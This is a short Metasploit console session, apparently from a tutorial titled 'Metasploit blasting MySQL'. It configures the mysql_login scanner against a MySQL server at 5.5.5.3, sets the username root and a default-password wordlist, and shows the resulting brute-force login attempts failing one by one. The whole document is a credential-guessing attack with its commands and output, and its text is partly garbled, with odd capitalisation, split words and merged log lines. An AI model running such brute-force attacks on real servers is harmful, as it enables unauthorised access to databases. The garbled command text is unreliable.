MSF > Use Auxiliary/scanner/mysql/mysql_login
MSF auxiliary (mysql_login) > Set RHOSTS 5.5.5.3
RHOSTS = 5.5.5.3
MSF auxiliary (mysql_login) > Set USERNAME root
USERNAME = root
MSF auxiliary (mysql_login) > Set pass_file/pen/msf3/data/wordlists/postgres_default_pass.txt
Pass_file =/pen/msf3/data/wordlists/postgres_default_pass.txt
MSF auxiliary (mysql_login) > Exploit
[*] 5.5.5.3:3306 mysql–found remote MYSQL version 5.5.16
[*] 5.5.5.3:3306 mysql–[1/7]–trying username: ' Root ' with password: '
[*] 5.5.5.3:3306 mysql–[1/7]–failed to login as ' root ' with password "
[*] 5.5.5.3:3306 mysql–[2/7]–trying username: ' Root ' with password: ' Root '
[*] 5.5.5.3:3306 mysql–[2/7]–failed to login as ' root ' with password ' root '
[*] 5.5.5.3:3306 mysql–[3/7]–trying username: ' Root ' with password: ' Tiger '
[*] 5.5.5.3:3306 mysql–[3/7]–failed to login as ' root ' with password ' tiger ' [*] 5.5.5.3:3306 mysql–[4/7]–trying US Ername: ' Root ' with password: ' Postgres '
Metasploit blasting MySQL